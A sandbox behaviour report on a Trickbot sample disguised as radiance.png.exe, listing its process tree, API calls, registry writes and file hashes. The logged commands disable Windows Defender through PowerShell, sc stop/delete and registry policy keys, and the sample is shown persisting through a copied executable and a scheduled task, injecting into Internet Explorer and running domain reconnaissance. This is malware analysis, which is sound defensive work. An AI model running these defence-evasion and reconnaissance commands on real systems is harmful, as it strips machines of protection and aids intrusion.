Trickbot 2019-05-16

Remarks

Max Dump Size Reached (0x200000c): The maximum memory dump size was exceeded. Some dumps may be missing in the report.

Code Overwrite Detected (0x200001f): Code in memory was overwritten during this analysis. Review corresponding VTI for more info.

Monitored Processes

Process Overview

ID	PID	Monitor Reason	Integrity Level	Image Name	Command Line	Origin ID
#1	0xd50	Analysis Target	Medium	radiance.png.exe	"C:\Users\2XC7u663GxWc\Desktop\radiance.png.exe"	-
#2	0xd6c	Child Process	Medium	cmd.exe	"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true	#1
#3	0xd78	Child Process	Medium	cmd.exe	"C:\Windows\System32\cmd.exe" /c sc stop WinDefend	#1
#4	0xd94	Child Process	Medium	cmd.exe	"C:\Windows\System32\cmd.exe" /c sc delete WinDefend	#1
#5	0xdc0	Child Process	Medium	sc.exe	sc delete WinDefend	#4
#6	0xdc8	Child Process	Medium	sc.exe	sc stop WinDefend	#3
#7	0xdd0	Child Process	Medium	powershell.exe	powershell Set-MpPreference -DisableRealtimeMonitoring $true	#2
#8	0xeb8	Child Process	Medium	cmd.exe	/c sc stop WinDefend	#1
#9	0xed0	Child Process	Medium	sc.exe	sc stop WinDefend	#8
#10	0xedc	Child Process	Medium	cmd.exe	/c sc delete WinDefend	#1
#11	0xeec	Child Process	Medium	cmd.exe	/c powershell Set-MpPreference -DisableRealtimeMonitoring $true	#1
#12	0xf04	Child Process	Medium	powershell.exe	powershell Set-MpPreference -DisableRealtimeMonitoring $true	#11
#13	0xf14	Child Process	Medium	sc.exe	sc delete WinDefend	#10
#14	0xf84	RPC Server	High (Elevated)	dllhost.exe	C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}	#1
#15	0xfac	Child Process	High (Elevated)	tadiapce.exe	"C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\tadiapce.exe"	#14
#16	0xfc4	Child Process	High (Elevated)	cmd.exe	"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true	#15
#17	0xfd8	Child Process	High (Elevated)	cmd.exe	"C:\Windows\System32\cmd.exe" /c sc stop WinDefend	#15
#18	0xffc	Child Process	High (Elevated)	cmd.exe	"C:\Windows\System32\cmd.exe" /c sc delete WinDefend	#15
#19	0x81c	Child Process	High (Elevated)	powershell.exe	powershell Set-MpPreference -DisableRealtimeMonitoring $true	#16
#20	0x83c	Child Process	High (Elevated)	sc.exe	sc stop WinDefend	#17
#21	0x8e4	Child Process	High (Elevated)	sc.exe	sc delete WinDefend	#18
#23	0x914	Created Scheduled Job	System (Elevated)	taskeng.exe	taskeng.exe {E6ACF615-28B7-4794-9E2D-7B8DC4832D2F} S-1-5-18:NT AUTHORITY\System:Service:	#15
#24	0x214	Child Process	System (Elevated)	tadiapce.exe	C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\tadiapce.exe	#23
#26	0x22c	Child Process	System (Elevated)	cmd.exe	"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true	#24
#27	0x7dc	Child Process	System (Elevated)	cmd.exe	"C:\Windows\System32\cmd.exe" /c sc stop WinDefend	#24
#28	0x3ac	Child Process	System (Elevated)	powershell.exe	powershell Set-MpPreference -DisableRealtimeMonitoring $true	#26
#29	0x394	Child Process	System (Elevated)	cmd.exe	"C:\Windows\System32\cmd.exe" /c sc delete WinDefend	#24
#30	0x8a0	Child Process	System (Elevated)	sc.exe	sc stop WinDefend	#27
#31	0x9a0	Child Process	System (Elevated)	sc.exe	sc delete WinDefend	#29
#33	0x4d8	Child Process	Medium	svchost.exe	svchost.exe	#24
#34	0xa60	Child Process	Medium	svchost.exe	svchost.exe	#24
#35	0x110	Child Process	System (Elevated)	svchost.exe	svchost.exe	#24
#36	0xc38	Injection	Medium	iexplore.exe	"C:\Program Files\Internet Explorer\iexplore.exe" -nohome	#35
#37	0xc94	Injection	Medium	iexplore.exe	"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3128 CREDAT:14337	#35
#38	0x6d8	Child Process	Medium	svchost.exe	svchost.exe	#24
#40	0xa70	Child Process	Medium	svchost.exe	svchost.exe	#24
#43	0x3ec	Child Process	Medium	cmd.exe	/c ipconfig /all	#40
#44	0xcf4	Child Process	Medium	ipconfig.exe	ipconfig /all	#43
#45	0xb28	Child Process	Medium	svchost.exe	svchost.exe	#24
#47	0xa50	Child Process	Medium	cmd.exe	/c net config workstation	#40
#48	0xd4c	Child Process	Medium	net.exe	net config workstation	#47
#49	0x3dc	Child Process	Medium	net1.exe	C:\Windows\system32\net1 config workstation	#48
#50	0xda0	Child Process	Medium	svchost.exe	svchost.exe	#24
#51	0xbb4	Child Process	Medium	cmd.exe	/c net view /all	#40
#53	0x748	Child Process	System (Elevated)	svchost.exe	svchost.exe	#24
#54	0xd70	Child Process	Medium	cmd.exe	/c net view /all /domain	#40
#56	0xed0	Child Process	Medium	cmd.exe	/c nltest /domain_trusts	#40
#58	0xf1c	Child Process	Medium	cmd.exe	/c nltest /domain_trusts /all_trusts	#40

Behavior Information - Sequential View

Process #1: radiance.png.exe

864

Information	Value
ID	#1
File Name	c:\users\2xc7u663gxwc\desktop\radiance.png.exe
Command Line	"C:\Users\2XC7u663GxWc\Desktop\radiance.png.exe"
Initial Working Directory	C:\Users\2XC7u663GxWc\Desktop\
Monitor	Start Time: 00:00:16, Reason: Analysis Target
Unmonitor	End Time: 00:00:57, Reason: Self Terminated
Monitor Duration	00:00:40

OS Process Information

Information	Value
PID	0xd50
Parent PID	0x61c (c:\windows\explorer.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x D54 0x D5C 0x D60 0x D64 0x D68 0x D74 0x D80 0x E34 0x F34

Memory Dumps

Name	Start VA	End VA	Dump Reason	PE Rebuilds	Bitness	Entry Points	Actions
radiance.png.exe	0x00400000	0x00448FFF	Relevant Image	-	32-bit	-	... Region Actions Download Dump
buffer	0x00150000	0x00151FFF	First Execution	-	32-bit	0x00151140, 0x001512D0, ...	... Region Actions Download Dump
buffer	0x003C0000	0x003C0FFF	First Execution	-	32-bit	0x003C0000	... Region Actions Download Dump
buffer	0x00450000	0x00450FFF	First Execution	-	32-bit	0x00450000	... Region Actions Download Dump
buffer	0x01A60000	0x01A8AFFF	First Execution	-	32-bit	0x01A77D1F, 0x01A78A78, ...	... Region Actions Download Dump

Dropped Files

Filename	File Size	Hash Values	YARA Match	Actions
C:\Users\2XC7u663GxWc\Desktop\radiance.png.exe	250.00 KB	MD5: 5c163d92cb7b0b913b1e9fce3e179477 SHA1: 574aa8b8d8bc98cda8038f8a5084d36367e4ce82 SHA256: c8781c38c7a9b921049963a276513cf6057d85766e7517ff5eb6e4bc4d0c397b SSDeep: 6144:Kz0qq/ZdqMwdoXqTHBgVkVWp0UhmMNYWZ:vXqTHBguVdKmMCW		... File Actions Show Properties Download

Modified Files

Filename	File Size	Hash Values	YARA Match	Actions
c:\users\2xc7u663gxwc\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-3727408139-63090477-3136880571-1000\a7ad97fe866c7f48db63edede97b2b9b_3912d7c0-2df4-4798-9de9-c60c58f001d5	1.03 KB	MD5: 6a60611fe15b070e3e11b53bc3d9dc87 SHA1: 784e344f476e13ff693271bc985c40049afc1b9a SHA256: f7ccc163182308202c4c59dc5c6443be6df032ed5ec80f248ca0b4b61825898a SSDeep: 24:e0Kf5b6UwZYeKrPH4I4slxMm/rCnZwp5MVsJHjZ9:Wb6UwZhKrT4AxMM2Zwp2VsBjD		... File Actions Show Properties Download
c:\users\2xc7u663gxwc\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-3727408139-63090477-3136880571-1000\a7ad97fe866c7f48db63edede97b2b9b_3912d7c0-2df4-4798-9de9-c60c58f001d5	1.03 KB	MD5: 87a4844794b4d8228031077194c5f62d SHA1: eb5b65b9fa18579b870d91d0b7b340b939b42946 SHA256: 714e64be4710d49ecc8995a532b080cd9af9ab9bc677d42b5ca22a003abf89de SSDeep: 24:e0Kf5b6UwfxF1wX6U2VMf0kYknnfvzkM9SSwZ+rciXMParI13owlmTbV6jE:Wb6UwfxEX6U2VMUknnDkLhZLi8PSI14b		... File Actions Show Properties Download

Threads

Thread 0xd54

385

Category	Operation	Information	Count	Logfile
Module	Get Handle	module_name = c:\users\2xc7u663gxwc\desktop\radiance.png.exe, base_address = 0x400000	2	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\users\2xc7u663gxwc\desktop\radiance.png.exe, base_address = 0x400000	1	Fn
Module	Get Address	module_name = c:\users\2xc7u663gxwc\desktop\radiance.png.exe, function = ___CPPdebugHook, address_out = 0x40e13c	1	Fn
Module	Get Handle	module_name = c:\users\2xc7u663gxwc\desktop\radiance.png.exe, base_address = 0x400000	1	Fn
Module	Get Address	module_name = c:\users\2xc7u663gxwc\desktop\radiance.png.exe, function = ___CPPdebugHook, address_out = 0x40e13c	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x76b633d3	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = Borland32, address_out = 0x0	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Filename	process_name = c:\users\2xc7u663gxwc\desktop\radiance.png.exe, file_name_orig = C:\Users\2XC7u663GxWc\Desktop\radiance.png.exe, size = 255	1	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	3	Fn
Module	Get Handle	module_name = c:\users\2xc7u663gxwc\desktop\radiance.png.exe, base_address = 0x400000	1	Fn
Window	Create	window_name = Squirrel Shootout by Brenton Andrew Saunders, class_name = Squirrel Shootout by Brenton Andrew Saunders, wndproc_parameter = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 1	1	Fn
System	Sleep	duration = 1 milliseconds (0.001 seconds)	1	Fn
System	Sleep	duration = 50 milliseconds (0.050 seconds)	1	Fn
Module	Load	module_name = Crypt32.dll, base_address = 0x75610000	1	Fn
Module	Get Address	module_name = c:\windows\system32\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x75645d77	1	Fn
Module	Load	module_name = Crypt32.dll, base_address = 0x75610000	1	Fn
Module	Get Address	module_name = c:\windows\system32\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x75645d77	1	Fn
Module	Load	module_name = Crypt32.dll, base_address = 0x75610000	1	Fn
Module	Get Address	module_name = c:\windows\system32\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x75645d77	1	Fn
Module	Load	module_name = Crypt32.dll, base_address = 0x75610000	1	Fn
Module	Get Address	module_name = c:\windows\system32\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x75645d77	1	Fn
Module	Load	module_name = kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Load	module_name = advapi32.dll, base_address = 0x774c0000	1	Fn
Module	Load	module_name = shell32.dll, base_address = 0x75bb0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = Wow64EnableWow64FsRedirection, address_out = 0x76b98bc9	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegCloseKey, address_out = 0x774d469d	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegCreateKeyW, address_out = 0x774d1514	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegOpenKeyExW, address_out = 0x774d468d	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegSetValueExW, address_out = 0x774d14d6	1	Fn
Module	Get Address	module_name = c:\windows\system32\shell32.dll, function = ShellExecuteA, address_out = 0x75df7078	1	Fn
Process	Create	process_name = cmd, show_window = SW_HIDE	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 1	1	Fn
Keyboard	Read	virtual_key_code = VK_LEFT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RIGHT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SPACE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RETURN, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD4, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD6, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ADD, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SUBTRACT, result_out = 0	1	Fn
System	Get Time	type = Ticks, time = 10878152	129	Fn
System	Get Time	type = Ticks, time = 10878168	120	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 1	2	Fn
Keyboard	Read	virtual_key_code = VK_LEFT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RIGHT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SPACE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RETURN, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD4, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD6, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ADD, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SUBTRACT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 1	3	Fn
Keyboard	Read	virtual_key_code = VK_LEFT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RIGHT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SPACE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RETURN, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD4, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD6, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ADD, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SUBTRACT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 1	4	Fn
Keyboard	Read	virtual_key_code = VK_LEFT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RIGHT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SPACE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RETURN, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD4, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD6, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ADD, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SUBTRACT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 1	4	Fn
Keyboard	Read	virtual_key_code = VK_LEFT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RIGHT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SPACE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RETURN, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD4, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD6, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ADD, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SUBTRACT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 1	4	Fn
Keyboard	Read	virtual_key_code = VK_LEFT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RIGHT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SPACE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RETURN, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD4, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD6, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ADD, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SUBTRACT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 1	3	Fn
Keyboard	Read	virtual_key_code = VK_LEFT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RIGHT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SPACE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RETURN, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD4, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD6, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ADD, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SUBTRACT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 1	3	Fn
Keyboard	Read	virtual_key_code = VK_LEFT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RIGHT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SPACE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RETURN, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD4, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD6, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ADD, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SUBTRACT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 1	1	Fn
Process	Create	process_name = cmd, show_window = SW_HIDE	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 1	1	Fn
Keyboard	Read	virtual_key_code = VK_LEFT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RIGHT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SPACE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RETURN, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD4, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD6, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ADD, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SUBTRACT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 1	2	Fn
Process	Create	process_name = cmd, show_window = SW_HIDE	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 1	1	Fn
Keyboard	Read	virtual_key_code = VK_LEFT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RIGHT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SPACE, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_RETURN, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD4, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMPAD6, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_ADD, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_SUBTRACT, result_out = 0	1	Fn
Keyboard	Read	virtual_key_code = VK_NUMLOCK, result_out = 1	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender, value_name = DisableAntiSpyware, size = 4, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection, value_name = DisableBehaviorMonitoring, size = 4, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection, value_name = DisableOnAccessProtection, size = 4, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection, value_name = DisableOnRealtimeEnable, size = 4, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection, value_name = DisableIOAVProtection, size = 4, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
System	Sleep	duration = 3 milliseconds (0.003 seconds)	1	Fn
Module	Load	module_name = advapi32.dll, base_address = 0x774c0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptAcquireContextA, address_out = 0x774c91dd	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptImportKey, address_out = 0x774cc532	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CryptEncrypt, address_out = 0x774e779b	1	Fn
Module	Load	module_name = kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Load	module_name = ntdll.dll, base_address = 0x77330000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = VirtualAlloc, address_out = 0x76b62fb6	1	Fn
Module	Get Address	module_name = c:\windows\system32\ntdll.dll, function = memcpy, address_out = 0x77364cc0	1	Fn
Module	Load	module_name = KERNEL32.dll, base_address = 0x0	1	Fn
System	Sleep	duration = 1 milliseconds (0.001 seconds)	255	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Service	Open Manager	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Service	Open	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Service	Open Manager	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Service	Open	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Service	Get Info	service_name = WinDefend	1	Fn
Process	Create	process_name = C:\Windows\system32\cmd.exe, os_pid = 0xeb8, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE	1	Fn
System	Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
Process	Create	process_name = C:\Windows\system32\cmd.exe, os_pid = 0xedc, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE	1	Fn
Process	Enumerate Processes	-	49	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	50	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	50	Fn
Process	Enumerate Processes	-	1	Fn
Process	Create	process_name = C:\Windows\system32\cmd.exe, os_pid = 0xeec, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender, value_name = DisableAntiSpyware, size = 4, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications	1	Fn
Registry	Write Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications, value_name = DisableNotifications, size = 4, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Service	Open Manager	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Service	Open	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
System	Get Info	type = Hardware Information	1	Fn
Module	Get Filename	module_name = KERNEL32.dll, process_name = c:\users\2xc7u663gxwc\desktop\radiance.png.exe, file_name_orig = C:\Users\2XC7u663GxWc\Desktop\radiance.png.exe, size = 260	1	Fn
File	Create Directory	C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata	1	Fn
File	Copy	source_filename = C:\Users\2XC7u663GxWc\Desktop\radiance.png.exe, destination_filename = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\tadiapce.exe	1	Fn
System	Get Info	type = Windows Directory, result_out = C:\Windows	1	Fn
System	Sleep	duration = 500 milliseconds (0.500 seconds)	1	Fn
System	Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn

Process #2: cmd.exe

Information	Value
ID	#2
File Name	c:\windows\system32\cmd.exe
Command Line	"C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
Initial Working Directory	C:\Users\2XC7u663GxWc\Desktop\
Monitor	Start Time: 00:00:26, Reason: Child Process
Unmonitor	End Time: 00:00:45, Reason: Self Terminated
Monitor Duration	00:00:19

OS Process Information

Information	Value
PID	0xd6c
Parent PID	0xd50 (c:\users\2xc7u663gxwc\desktop\radiance.png.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x D70

Threads

Thread 0xd70

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-05-14 15:30:40 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 10879119	1	Fn
System	Get Time	type = Performance Ctr, time = 10100670165	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4a050000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x76b624c2	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 232, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
